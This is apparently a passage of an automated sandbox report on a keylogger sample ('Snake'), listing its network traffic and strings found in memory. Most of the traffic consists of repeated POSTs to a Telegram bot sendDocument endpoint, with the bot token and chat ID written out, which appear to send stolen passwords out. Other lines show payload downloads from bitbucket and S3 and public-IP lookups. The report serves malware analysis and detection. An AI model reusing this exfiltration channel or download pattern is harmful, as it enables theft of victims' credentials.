              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd245aeb8c82beHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22be5581407dHost: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd26038213f839Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24a8fb2c45b9Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22fa34213483Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2698048ede00Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24f586dd246fHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23336ff9d791Host: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd271e66cb8366Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd253f1bc168daHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd235621b119dfHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd27765a939a1aHost: api.telegram.orgContent-Length: 535
              Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 185.166.143.48:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 54.231.224.185:443
              Source: global trafficHTTP traffic detected: GET /ntim1478/gpmaw/downloads/202_Cneehezxuzj HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNHUQUF4A6&Signature=cFww4wpmqtopKHlnmXlm4GVTpQg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIEndov2P1y0Z9e0DlTVxAv6A14kmp9GBJjmAh%2FjmTMFwAiBjG2TfGOxIkvMGRVFDckh%2BAASexPpbLyJKYHMryKxSriqnAghhEAAaDDk4NDUyNTEwMTE0NiIMf%2Bh2cKia5Yx4TuvBKoQCEEzKKpluFmsQkjGCbSPYf%2BLJiFaVkBou%2B66q5kuWxCylJUxBLQOH3EPVfOOqBUsjv%2BplzMxEMKiVkX7udPXu7zIKdXWWG%2B%2BprQZWvy0TX23XQIYbgpnfJojx0RHba%2BldodnwwKFHrr3lIgLVesPQYtw%2BCu6ZsSzrD29UkfkzW8%2F1hoA2B9KHRvxC9iLESNK%2BeIGKhxzVjTXsaxwf%2BSOHufmSV7YsLhCS9yy56Xi7gDSRpgaqGyuCq1RWZTJumEq3IbG6r4YeWb%2BAI6F5GCPynlAkfItG6ShyZ1YbOdESvbkj%2Bg51ynTw5XoOaU%2Fbe4vVdWpFvhgzAs6zpE%2FVGK3eqCo%2FMJ4w6dSLuwY6ngEhZlKNLEhMPrSpaSiwOVqR5QNGIQ%2Fe2ipvll7jjw67tvUewMuEkhMTDcvqFrlpslPfjG4qG81rcgIZEGMXYjC0fmyX7PQssGw0Vl9DOmiTKooxU4XM8Nsbc08SmOisr1aKKCWOStpDcrXcuLWl%2FynXNzUVR7RppUbIoeRML505tHM5flInq%2FVElsON8KVn%2BAM4ApVp3auvaOjnmPP3sQ%3D%3D&Expires=1734537585 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f4f091cadcaHost: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.00000000229B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgh
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/h
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/p
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: spoolsv.COM, 0000000A.00000002.1613318386.0000000021A10000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1580963085.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612795563.000000002193C000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, xzeheenC.pif.10.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: spoolsv.COM, 0000000A.00000002.1613318386.0000000021A10000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1580963085.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612795563.000000002193C000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, xzeheenC.pif.10.drString found in binary or memory: http://ocsp.comodoca.com0$
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
